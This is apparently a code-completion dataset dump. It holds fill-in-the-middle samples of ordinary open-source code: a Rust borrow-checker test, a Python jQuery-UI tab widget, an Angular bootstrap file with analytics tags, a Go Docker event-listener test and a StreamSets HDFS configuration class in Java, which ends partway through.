prompt: large_string (lengths 70 to 991k)
completion: large_string (lengths 0 to 1.02k)
<|file_name|>borrowck-borrow-from-expr-block.rs<|end_file_name|><|fim▁begin|>// Copyright 2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.

use std::gc::{Gc, GC};

fn borrow(x: &int, f: |x: &int|) {
    f(x)
}

<|fim▁hole|>fn test1(x: Gc<Box<int>>) {
    borrow(&*(*x).clone(), |p| {
        let x_a = &**x as *const int;
        assert!((x_a as uint) != (p as *const int as uint));
        assert_eq!(unsafe{*x_a}, *p);
    })
}

pub fn main() {
    test1(box(GC) box 22);
}<|fim▁end|>
<|file_name|>Tab.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
#
# Copyright (C) 2010 CENATIC: Centro Nacional de Referencia de
# Aplicacion de las TIC basadas en Fuentes Abiertas, Spain.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# Neither the name of the CENATIC nor the names of its contributors
# may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# You may contact the copyright holder at: Fundacion CENATIC, Avenida
# Clara Campoamor, s/n. 06200 Almendralejo (Badajoz), Spain
#
# NOTE: This version of CTK is a fork re-licensed by its author. The
# mainstream version of CTK is available under a GPLv2 license
# at the Cherokee Project source code repository.
#

import string
from Widget import Widget

# WARNING
# -------
# This class currently depends on a modified version of jQuery-UI. For
# some reason I still cannot quite comprehend, there is no way to stop
# jQuery's tab class from removing the active tab cookie when its
# destroy() method is executed.
#
# The following patch has been applied to our jquery-ui copy. It just
# removes three lines from the destroy() method, so the cookie is not
# wiped out:
#
#  -    if (o.cookie) {
#  -        this._cookie(null, o.cookie);
#  -    }
#
# We ought to wrap the method to store the cookie value before the
# method execution, and to restore it afterwards. In that way we could
# use a standard version of jQuery-UI.

HEADER = [
    '<link type="text/css" href="/CTK/css/CTK.css" rel="stylesheet" />',
    '<script type="text/javascript" src="/CTK/js/jquery-ui-1.7.2.custom.min.js"></script>',
    '<script type="text/javascript" src="/CTK/js/jquery.cookie.js"></script>'
]

HTML = """
<div id="tab_%(id)s">
  %(html)s
</div> <!-- %(id)s -->
"""

HTML_UL = """<ul class="ui-tabs-nav">%(li_tabs)s</ul>"""
HTML_LI = """<li><a href="#%(tab_ref)s"><span>%(title)s</span></a></li>"""

HTML_TAB = """
<div id="%(tab_ref)s">
  %(widget)s
</div> <!-- %(tab_ref)s -->
"""

JS_INIT = """
$("#tab_%(id)s").each(function() {
   var this_tab = $(this);
   var path_begin = location.href.indexOf('/', location.href.indexOf('://') + 3);
   var path = location.href.substring (path_begin);

   this_tab.find("ul li:first").addClass("ui-tabs-first");
   this_tab.find("ul li:last").addClass("ui-tabs-last");
   this_tab.tabs({
       cookie: {path: path, name: 'opentab'}
   }).bind('tabsselect', function(event, ui) {
       /* Selection fixes for the tab theme */
       var tabslen  = this_tab.tabs('length');
       var nprevtab = parseInt(get_cookie('opentab')) + 2;
       var nnexttab = parseInt(ui.index) + 2;

       if (nprevtab < tabslen) {
           this_tab.find("li:nth-child("+ nprevtab +")").removeClass("ui-tabs-selected-next");
       } else {<|fim▁hole|>
           this_tab.find("li:nth-child("+ nprevtab +")").removeClass("ui-tabs-selected-next-last");
       }
       if (nnexttab < tabslen) {
           this_tab.find("li:nth-child("+ nnexttab +")").addClass("ui-tabs-selected-next");
       } else {
           this_tab.find("li:nth-child("+ nnexttab +")").addClass("ui-tabs-selected-next-last");
       }
   });

   if (this_tab.tabs('option', 'selected') == 0) {
       if (this_tab.tabs('length') == 2) {
           this_tab.find("li:nth-child(2)").addClass("ui-tabs-selected-next-last");
       } else {
           this_tab.find("li:nth-child(2)").addClass("ui-tabs-selected-next");
       }
   }

   var ninitab = parseInt(get_cookie('opentab')) + 2;
   if (ninitab < this_tab.tabs('length')) {
       this_tab.find("li:nth-child("+ ninitab +")").addClass("ui-tabs-selected-next");
   } else {
       this_tab.find("li:nth-child("+ ninitab +")").addClass("ui-tabs-selected-next-last");
   }
});
"""

class Tab (Widget):
    def __init__ (self, props=None):
        Widget.__init__ (self)
        self._tabs = []

        if props:
            self._props = props
        else:
            self._props = {}

        if not 'id' in self._props:
            self._props['id'] = 'widget%d'%(self.uniq_id)

    def Add (self, title, widget):
        assert type(title) == str
        assert isinstance(widget, Widget)
        self._tabs.append ((title, widget))

    def Render (self):
        render = Widget.Render(self)

        id       = self._props['id']
        ul_html  = ''
        tab_html = ''

        num = 1
        for title, widget in self._tabs:
            r = widget.Render()

            # Keep record of dependencies
            render.js      += r.js
            render.headers += r.headers
            render.helps   += r.helps

            tab_ref = ''
            for c in title:
                if c in string.letters + string.digits:
                    tab_ref += c
                else:
                    tab_ref += '_'
            tab_ref += '-%d' %(num)

            # Render <ul>
            props = {'id':      id,
                     'tab_ref': tab_ref,
                     'widget':  r.html,
                     'title':   title}

            ul_html  += HTML_LI %(props)
            tab_html += HTML_TAB %(props)
            num += 1

        # Render the whole thing
        tmp  = HTML_UL %({'li_tabs': ul_html})
        tmp += tab_html

        html = HTML %({'id': id, 'html': tmp})
        props = {'id':   id,
                 'tabs': html}

        render.html     = html
        render.js      += JS_INIT %(props)
        render.headers += HEADER

        return render<|fim▁end|>
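The Tab class above collects (title, widget) pairs and renders them into jQuery-UI tab markup. A minimal usage sketch follows; the Label widget in it is invented for illustration, and it assumes Widget.Render() returns an object exposing the .html/.js/.headers/.helps attributes that Tab.Render() relies on:

from Widget import Widget

class Label(Widget):
    # Hypothetical widget, used only to demonstrate Tab; not part of CTK.
    def __init__(self, text):
        Widget.__init__(self)
        self.text = text

    def Render(self):
        render = Widget.Render(self)
        render.html = '<span>%s</span>' % self.text
        return render

tab = Tab({'id': 'settings'})
tab.Add('General',  Label('General options'))
tab.Add('Advanced', Label('Advanced options'))
page_html = tab.Render().html  # embed in a page that also emits render.headers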
<|file_name|>main.ts<|end_file_name|><|fim▁begin|>import { enableProdMode } from '@angular/core';<|fim▁hole|>

import { AppModule } from './app/app.module';
import { environment } from './environments/environment';

if (environment.production) {
  enableProdMode();
  // GA tracking
  document.write('<script async src="https://www.googletagmanager.com/gtag/js?id=UA-64617433-10"></script><script>window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}gtag(\'js\', new Date()); gtag(\'config\', \'UA-64617433-10\'); </script>');
}

platformBrowserDynamic().bootstrapModule(AppModule)
  .catch(err => console.error(err));<|fim▁end|>
import { platformBrowserDynamic } from '@angular/platform-browser-dynamic';
<|file_name|>eventlistener_test.go<|end_file_name|><|fim▁begin|>package eventlistener

import (
    "testing"

    "github.com/docker/docker/api/types"
    "golang.org/x/net/context"

    "fmt"
    "time"

    "github.com/docker/docker/api/types/events"
)

// We simulate a docker die event and expect to get the dead container's id in the tasks channel
func TestEventListener(t *testing.T) {
    const labelToMonitor = "tugbot-test"
    tsk := make(chan string, 10)
    //l := NewEventListener(dockerClientMock{}, labelToMonitor, tsk)
    Register(dockerClientMock{}, labelToMonitor, tsk)
    select {
    case res := <-tsk:
        fmt.Println("we received the dead container's id via the tasks chan: ", res)
<|fim▁hole|>
    case <-time.After(time.Second * 5):
        t.Error("we did not receive the dead container's id on the tasks chan after 5 sec!")
    }
}

type dockerClientMock struct{}

func (d dockerClientMock) Events(ctx context.Context, options types.EventsOptions) (<-chan events.Message, <-chan error) {
    eventsChan := make(chan events.Message, 10)
    errChan := make(chan error, 10)
    event := events.Message{
        Type:   "container",
        Action: "die",
    }
    eventsChan <- event

    return eventsChan, errChan
}

func (d dockerClientMock) Info(ctx context.Context) (types.Info, error) {
    panic("This function is not supposed to be called")
}

func (d dockerClientMock) RegistryLogin(ctx context.Context, auth types.AuthConfig) (types.AuthResponse, error) {
    panic("This function is not supposed to be called")
}

func (d dockerClientMock) DiskUsage(ctx context.Context) (types.DiskUsage, error) {
    panic("This function is not supposed to be called")
}

func (d dockerClientMock) Ping(ctx context.Context) (bool, error) {
    panic("This function is not supposed to be called")
}<|fim▁end|>
<|file_name|>HdfsTargetConfigBean.java<|end_file_name|><|fim▁begin|>/*
 * Copyright 2017 StreamSets Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package com.streamsets.pipeline.stage.destination.hdfs;

import com.codahale.metrics.Counter;
import com.codahale.metrics.Meter;
import com.google.common.annotations.VisibleForTesting;
import com.streamsets.pipeline.api.ConfigDef;
import com.streamsets.pipeline.api.ConfigDefBean;
import com.streamsets.pipeline.api.Stage;
import com.streamsets.pipeline.api.StageException;
import com.streamsets.pipeline.api.Target;
import com.streamsets.pipeline.api.ValueChooserModel;
import com.streamsets.pipeline.api.el.ELEval;
import com.streamsets.pipeline.api.el.ELEvalException;
import com.streamsets.pipeline.api.el.ELVars;
import com.streamsets.pipeline.api.el.SdcEL;
import com.streamsets.pipeline.config.DataFormat;
import com.streamsets.pipeline.config.TimeZoneChooserValues;
import com.streamsets.pipeline.lib.el.DataUtilEL;
import com.streamsets.pipeline.lib.el.RecordEL;
import com.streamsets.pipeline.lib.el.TimeEL;
import com.streamsets.pipeline.lib.el.TimeNowEL;
import com.streamsets.pipeline.lib.hdfs.common.Errors;
import com.streamsets.pipeline.lib.hdfs.common.HdfsBaseConfigBean;
import com.streamsets.pipeline.stage.destination.hdfs.writer.ActiveRecordWriters;
import com.streamsets.pipeline.stage.destination.hdfs.writer.RecordWriterManager;
import com.streamsets.pipeline.stage.destination.lib.DataGeneratorFormatConfig;
import org.apache.hadoop.conf.Configurable;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.io.SequenceFile;
import org.apache.hadoop.io.compress.CompressionCodec;
import org.apache.hadoop.security.UserGroupInformation;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

import java.io.IOException;
import java.net.URI;
import java.security.PrivilegedExceptionAction;
import java.time.ZoneId;
import java.util.Date;
import java.util.List;
import java.util.TimeZone;
import java.util.UUID;
import java.util.concurrent.atomic.AtomicBoolean;

public class HdfsTargetConfigBean extends HdfsBaseConfigBean {

  private static final Logger LOG = LoggerFactory.getLogger(HdfsTargetConfigBean.class);
  private static final int MEGA_BYTE = 1024 * 1024;

  @Override
  protected String getConfigBeanPrefix() {
    return "hdfsTargetConfigBean.";
  }

  @ConfigDef(
      required = false,
      type = ConfigDef.Type.STRING,
      defaultValue = "sdc-${sdc:id()}",
      label = "Files Prefix",
      description = "File name prefix",
      displayPosition = 105,
      group = "OUTPUT_FILES",
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      elDefs = SdcEL.class
  )
  public String uniquePrefix;

  @ConfigDef(
      required = false,
      type = ConfigDef.Type.STRING,
      label = "Files Suffix",
      description = "File name suffix e.g.'txt'",
      displayPosition = 106,
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      group = "OUTPUT_FILES",
      dependsOn = "fileType",
      triggeredByValue = {"TEXT", "SEQUENCE_FILE"}
  )
  public String fileNameSuffix;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.BOOLEAN,
      defaultValue = "false",
      label = "Directory in Header",
      description = "The directory is defined by the '" + HdfsTarget.TARGET_DIRECTORY_HEADER +
          "' record header attribute instead of the Directory Template configuration property.",
      displayPosition = 107,
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      group = "OUTPUT_FILES"
  )
  public boolean dirPathTemplateInHeader;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.STRING,
      defaultValue = "/tmp/out/${YYYY()}-${MM()}-${DD()}-${hh()}",
      label = "Directory Template",
      description = "Template for the creation of output directories. Valid variables are ${YYYY()}, ${MM()}, ${DD()}, " +
          "${hh()}, ${mm()}, ${ss()} and {record:value(“/field”)} for values in a field. Directories are " +
          "created based on the smallest time unit variable used.",
      displayPosition = 110,
      displayMode = ConfigDef.DisplayMode.BASIC,
      group = "OUTPUT_FILES",
      elDefs = {RecordEL.class, TimeEL.class, ExtraTimeEL.class},
      evaluation = ConfigDef.Evaluation.EXPLICIT,
      dependsOn = "dirPathTemplateInHeader",
      triggeredByValue = "false"
  )
  public String dirPathTemplate;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.MODEL,
      defaultValue = "UTC",
      label = "Data Time Zone",
      description = "Time zone to use to resolve directory paths",
      displayPosition = 120,
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      group = "OUTPUT_FILES"
  )
  @ValueChooserModel(TimeZoneChooserValues.class)
  public String timeZoneID;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.STRING,
      defaultValue = "${time:now()}",
      label = "Time Basis",
      description = "Time basis to use for a record. Enter an expression that evaluates to a datetime. To use the " +
          "processing time, enter ${time:now()}. To use field values, use '${record:value(\"<filepath>\")}'.",
      displayPosition = 130,
      group = "OUTPUT_FILES",
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      elDefs = {RecordEL.class, TimeEL.class, TimeNowEL.class},
      evaluation = ConfigDef.Evaluation.EXPLICIT
  )
  public String timeDriver;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.NUMBER,
      defaultValue = "0",
      label = "Max Records in File",
      description = "Number of records that triggers the creation of a new file. Use 0 to opt out.",
      displayPosition = 140,
      group = "OUTPUT_FILES",
      min = 0,
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      dependsOn = "fileType",
      triggeredByValue = {"TEXT", "SEQUENCE_FILE"}
  )
  public long maxRecordsPerFile;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.NUMBER,
      defaultValue = "0",
      label = "Max File Size (MB)",
      description = "Exceeding this size triggers the creation of a new file. Use 0 to opt out.",
      displayPosition = 150,
      group = "OUTPUT_FILES",
      min = 0,
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      dependsOn = "fileType",
      triggeredByValue = {"TEXT", "SEQUENCE_FILE"}
  )
  public long maxFileSize;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.STRING,
      defaultValue = "${1 * HOURS}",
      label = "Idle Timeout",
      description = "Maximum time for a file to remain idle. After no records are written to a file for the" +
          " specified time, the destination closes the file. Enter a number to specify a value in seconds. You" +
          " can also use the MINUTES or HOURS constants in an expression. Use -1 to opt out of a timeout.",
      group = "OUTPUT_FILES",
      displayPosition = 155,
      elDefs = {TimeEL.class},
      evaluation = ConfigDef.Evaluation.EXPLICIT,
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      dependsOn = "fileType",
      triggeredByValue = {"TEXT", "SEQUENCE_FILE"}
  )
  public String idleTimeout;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.MODEL,
      defaultValue = "NONE",
      label = "Compression Codec",
      description = "",
      displayPosition = 160,
      group = "OUTPUT_FILES",
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      dependsOn = "fileType",
      triggeredByValue = {"TEXT", "SEQUENCE_FILE"}
  )
  @ValueChooserModel(CompressionChooserValues.class)
  public CompressionMode compression;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.STRING,
      defaultValue = "",
      label = "Compression Codec Class",
      description = "Use the full class name",
      displayPosition = 170,
      group = "OUTPUT_FILES",
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      dependsOn = "compression",
      triggeredByValue = "OTHER"
  )
  public String otherCompression;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.MODEL,
      defaultValue = "TEXT",
      label = "File Type",
      description = "",
      displayPosition = 100,
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      group = "OUTPUT_FILES"
  )
  @ValueChooserModel(FileTypeChooserValues.class)
  public HdfsFileType fileType;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.STRING,
      defaultValue = "${uuid()}",
      label = "Sequence File Key",
      description = "Record key for creating Hadoop sequence files. Valid options are " +
          "'${record:value(\"<field-path>\")}' or '${uuid()}'",
      displayPosition = 180,
      group = "OUTPUT_FILES",
      dependsOn = "fileType",
      triggeredByValue = "SEQUENCE_FILE",
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      evaluation = ConfigDef.Evaluation.EXPLICIT,
      elDefs = {RecordEL.class, DataUtilEL.class}
  )
  public String keyEl;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.MODEL,
      defaultValue = "BLOCK",
      label = "Compression Type",
      description = "Compression type if using a CompressionCodec",
      displayPosition = 190,
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      group = "OUTPUT_FILES",
      dependsOn = "fileType",
      triggeredByValue = "SEQUENCE_FILE"
  )
  @ValueChooserModel(HdfsSequenceFileCompressionTypeChooserValues.class)
  public HdfsSequenceFileCompressionType seqFileCompressionType;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.STRING,
      defaultValue = "${1 * HOURS}",
      label = "Late Record Time Limit (secs)",
      description = "Time limit (in seconds) for a record to be written to the corresponding directory, if the " +
          "limit is exceeded the record will be written to the current late records file. " +
          "If a number is used it is considered seconds, it can be multiplied by 'MINUTES' or 'HOURS', ie: " +
          "'${30 * MINUTES}'",
      displayPosition = 200,
      group = "LATE_RECORDS",
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      elDefs = {TimeEL.class},
      evaluation = ConfigDef.Evaluation.EXPLICIT
  )
  public String lateRecordsLimit;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.BOOLEAN,
      defaultValue = "false",
      label = "Use Roll Attribute",
      description = "Closes the current file and creates a new file when processing a record with the specified roll attribute",
      displayPosition = 204,
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      group = "OUTPUT_FILES"
  )
  public boolean rollIfHeader;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.STRING,
      defaultValue = "roll",
      label = "Roll Attribute Name",
      description = "Name of the roll attribute",
      displayPosition = 205,
      group = "OUTPUT_FILES",
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      dependsOn = "rollIfHeader",
      triggeredByValue = "true"
  )
  public String rollHeaderName;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.MODEL,
      defaultValue = "SEND_TO_ERROR",
      label = "Late Record Handling",
      description = "Action for records considered late.",
      displayPosition = 210,
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      group = "LATE_RECORDS"
  )
  @ValueChooserModel(LateRecordsActionChooserValues.class)
  public LateRecordsAction lateRecordsAction;

  @ConfigDef(
      required = false,
      type = ConfigDef.Type.STRING,
      defaultValue = "/tmp/late/${YYYY()}-${MM()}-${DD()}",
      label = "Late Record Directory Template",
      description = "Template for the creation of late record directories. Valid variables are ${YYYY()}, ${MM()}, " +
          "${DD()}, ${hh()}, ${mm()}, ${ss()}.",
      displayPosition = 220,
      group = "LATE_RECORDS",
      dependsOn = "lateRecordsAction",
      triggeredByValue = "SEND_TO_LATE_RECORDS_FILE",
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      elDefs = {RecordEL.class, TimeEL.class},
      evaluation = ConfigDef.Evaluation.EXPLICIT
  )
  public String lateRecordsDirPathTemplate;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.MODEL,
      label = "Data Format",
      description = "Data Format",
      displayPosition = 1,
      group = "DATA_FORMAT"
  )
  @ValueChooserModel(DataFormatChooserValues.class)
  public DataFormat dataFormat;

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.BOOLEAN,
      defaultValue = "true",
      label = "Validate Permissions",
      description = "When checked, the destination creates a test file in configured target directory to verify access privileges.",
      displayPosition = 230,
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      group = "OUTPUT_FILES"
  )
  public boolean hdfsPermissionCheck;

  //Optional if empty file is created with default umask.
  @ConfigDef(
      required = false,
      type = ConfigDef.Type.STRING,
      elDefs = {RecordEL.class},
      evaluation = ConfigDef.Evaluation.EXPLICIT,
      label = "Permissions Expression",
      description = "Expression that determines the target file permissions. " +
          "Should be an octal/symbolic representation of the permissions.",
      displayPosition = 460,
      group = "DATA_FORMAT",
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      dependsOn = "dataFormat",
      triggeredByValue = "WHOLE_FILE"
  )
  public String permissionEL = "";

  @ConfigDef(
      required = true,
      type = ConfigDef.Type.BOOLEAN,
      label = "Skip file recovery",
      defaultValue = "false",
      description = "Set to true to skip finding old temporary files that were written to and automatically recover them.",
      displayPosition = 1000,
      displayMode = ConfigDef.DisplayMode.ADVANCED,
      group = "OUTPUT_FILES"
  )
  public boolean skipOldTempFileRecovery = false;

  @ConfigDefBean(groups = {"DATA_FORMAT"})
  public DataGeneratorFormatConfig dataGeneratorFormatConfig;

  //private members

  private long lateRecordsLimitSecs;
  private long idleTimeSecs = -1;
  private ActiveRecordWriters currentWriters;
  private ActiveRecordWriters lateWriters;
  private ELEval timeDriverElEval;
  private CompressionCodec compressionCodec;
  private Counter toHdfsRecordsCounter;
  private Meter toHdfsRecordsMeter;
  private Counter lateRecordsCounter;
  private Meter lateRecordsMeter;

  //public API

  public void init(final Stage.Context context, List<Stage.ConfigIssue> issues) {
    boolean hadoopFSValidated = validateHadoopFS(context, issues);
    String fileNameEL = "";

    lateRecordsLimitSecs = initTimeConfigs(context, "lateRecordsLimit", lateRecordsLimit,
        Groups.LATE_RECORDS, false, Errors.HADOOPFS_10, issues);
    if (idleTimeout != null && !idleTimeout.isEmpty()) {
      idleTimeSecs = initTimeConfigs(context, "idleTimeout", idleTimeout,
          Groups.OUTPUT_FILES, true, Errors.HADOOPFS_52, issues);
    }

    if (maxFileSize < 0) {
      issues.add(
          context.createConfigIssue(
              Groups.LATE_RECORDS.name(),
              getConfigBeanPrefix() + "maxFileSize",
              Errors.HADOOPFS_08
          )
      );
    }

    if (maxRecordsPerFile < 0) {
      issues.add(
          context.createConfigIssue(
              Groups.LATE_RECORDS.name(),
              getConfigBeanPrefix() + "maxRecordsPerFile",
              Errors.HADOOPFS_09
          )
      );
    }

    if (uniquePrefix == null) {
      uniquePrefix = "";
    }

    if (fileNameSuffix == null) {
      fileNameSuffix = "";
    } else {
      //File Suffix should not contain '/' or start with '.'
      if (fileType != HdfsFileType.WHOLE_FILE && (fileNameSuffix.startsWith(".") || fileNameSuffix.contains("/"))) {
        issues.add(
            context.createConfigIssue(
                Groups.HADOOP_FS.name(),
                getConfigBeanPrefix() + "fileNameSuffix",
                Errors.HADOOPFS_57
            )
        );
      }
    }

    dataGeneratorFormatConfig.init(
        context,
        dataFormat,
        Groups.OUTPUT_FILES.name(),
        getConfigBeanPrefix() + "dataGeneratorFormatConfig",
        issues
    );

    if (dataFormat == DataFormat.WHOLE_FILE || fileType == HdfsFileType.WHOLE_FILE) {
      validateStageForWholeFileFormat(context, issues);
      fileNameEL = dataGeneratorFormatConfig.fileNameEL;
    }

    SequenceFile.CompressionType compressionType = (seqFileCompressionType != null)
        ? seqFileCompressionType.getType() : null;
    try {
      switch (compression) {
        case OTHER:
          try {
            Class klass = Thread.currentThread().getContextClassLoader().loadClass(otherCompression);
            if (CompressionCodec.class.isAssignableFrom(klass)) {
              compressionCodec = ((Class<? extends CompressionCodec>) klass).newInstance();
            } else {
              throw new StageException(Errors.HADOOPFS_04, otherCompression);
            }
          } catch (Exception ex1) {
            throw new StageException(Errors.HADOOPFS_05, otherCompression, ex1.toString(), ex1);
          }
          break;
        case NONE:
          break;
        default:
          try {
            compressionCodec = compression.getCodec().newInstance();
          } catch (IllegalAccessException | InstantiationException ex) {
            LOG.info("Error: " + ex.getMessage(), ex.toString(), ex);
            issues.add(context.createConfigIssue(Groups.OUTPUT_FILES.name(), null, Errors.HADOOPFS_48, ex.toString(), ex));
          }
          break;
      }
      if (compressionCodec != null) {
        if (compressionCodec instanceof Configurable) {
          ((Configurable) compressionCodec).setConf(hdfsConfiguration);
        }
      }
    } catch (StageException ex) {
      LOG.info("Validation Error: " + ex.getMessage(), ex.toString(), ex);
      issues.add(context.createConfigIssue(Groups.OUTPUT_FILES.name(), null, ex.getErrorCode(), ex.toString(), ex));
    }

    if (hadoopFSValidated) {
      try {
        // Creating RecordWriterManager for dirPathTemplate
        RecordWriterManager mgr = new RecordWriterManager(
            fs,
            hdfsConfiguration,
            uniquePrefix,
            fileNameSuffix,
            dirPathTemplateInHeader,
            dirPathTemplate,
            TimeZone.getTimeZone(ZoneId.of(timeZoneID)),
            lateRecordsLimitSecs,
            maxFileSize * MEGA_BYTE,
            maxRecordsPerFile,
            fileType,
            compressionCodec,
            compressionType,
            keyEl,
            rollIfHeader,
            rollHeaderName,
            fileNameEL,
            dataGeneratorFormatConfig.wholeFileExistsAction,
            permissionEL,
            dataGeneratorFormatConfig.getDataGeneratorFactory(),
            (Target.Context) context,
            "dirPathTemplate"
        );

        if (idleTimeSecs > 0) {
          mgr.setIdleTimeoutSeconds(idleTimeSecs);
        }

        // We're skipping all hdfs-target-directory related validations if we're getting the configuration from header
        if (dirPathTemplateInHeader) {
          currentWriters = new ActiveRecordWriters(mgr);
        } else {
          // validate if the dirPathTemplate can be resolved by Els constants
          if (mgr.validateDirTemplate(
              Groups.OUTPUT_FILES.name(),
              "dirPathTemplate",
              getConfigBeanPrefix() + "dirPathTemplate",
              issues
          )) {
            String newDirPath = mgr.getDirPath(new Date()).toString();
            if (validateHadoopDir( // permission check on the output directory
                context,
                getConfigBeanPrefix() + "dirPathTemplate",
                Groups.OUTPUT_FILES.name(),
                newDirPath,
                issues
            )) {
              currentWriters = new ActiveRecordWriters(mgr);
            }
          }
        }
      } catch (Exception ex) {
        LOG.info("Validation Error: " + Errors.HADOOPFS_11.getMessage(), ex.toString(), ex);
        issues.add(context.createConfigIssue(Groups.OUTPUT_FILES.name(), null, Errors.HADOOPFS_11, ex.toString(), ex));
      }

      // Creating RecordWriterManager for Late Records
      if (lateRecordsDirPathTemplate != null && !lateRecordsDirPathTemplate.isEmpty()) {
        try {
          RecordWriterManager mgr = new RecordWriterManager(
              fs,
              hdfsConfiguration,
              uniquePrefix,
              fileNameSuffix,
              false, // Late records doesn't support "template directory" to be in header
              lateRecordsDirPathTemplate,
              TimeZone.getTimeZone(ZoneId.of(timeZoneID)),
              lateRecordsLimitSecs,
              maxFileSize * MEGA_BYTE,
              maxRecordsPerFile,
              fileType,
              compressionCodec,
              compressionType,
              keyEl,
              false,
              null,
              fileNameEL,
              dataGeneratorFormatConfig.wholeFileExistsAction,
              permissionEL,
              dataGeneratorFormatConfig.getDataGeneratorFactory(),
              (Target.Context) context,
              "lateRecordsDirPathTemplate"
          );

          if (idleTimeSecs > 0) {
            mgr.setIdleTimeoutSeconds(idleTimeSecs);
          }

          // validate if the lateRecordsDirPathTemplate can be resolved by Els constants
          if (mgr.validateDirTemplate(
              Groups.OUTPUT_FILES.name(),
              "lateRecordsDirPathTemplate",
              getConfigBeanPrefix() + "lateRecordsDirPathTemplate",
              issues
          )) {
            String newLateRecordPath = mgr.getDirPath(new Date()).toString();
            if (lateRecordsAction == LateRecordsAction.SEND_TO_LATE_RECORDS_FILE &&
                lateRecordsDirPathTemplate != null && !lateRecordsDirPathTemplate.isEmpty() &&
                validateHadoopDir( // permission check on the late record directory
                    context,
                    getConfigBeanPrefix() + "lateRecordsDirPathTemplate",
                    Groups.LATE_RECORDS.name(),
                    newLateRecordPath,
                    issues
                )) {
              lateWriters = new ActiveRecordWriters(mgr);
            }
          }
        } catch (Exception ex) {
          issues.add(context.createConfigIssue(Groups.LATE_RECORDS.name(), null, Errors.HADOOPFS_17, ex.toString(), ex));
        }
      }
    }

    timeDriverElEval = context.createELEval("timeDriver");
    try {
      ELVars variables = context.createELVars();
      RecordEL.setRecordInContext(variables, context.createRecord("validationConfigs"));
      TimeNowEL.setTimeNowInContext(variables, new Date());
      context.parseEL(timeDriver);
      timeDriverElEval.eval(variables, timeDriver, Date.class);
    } catch (ELEvalException ex) {
      issues.add(
          context.createConfigIssue(
              Groups.OUTPUT_FILES.name(),
              getConfigBeanPrefix() + "timeDriver",
              Errors.HADOOPFS_19,
              ex.toString(),
              ex
          )
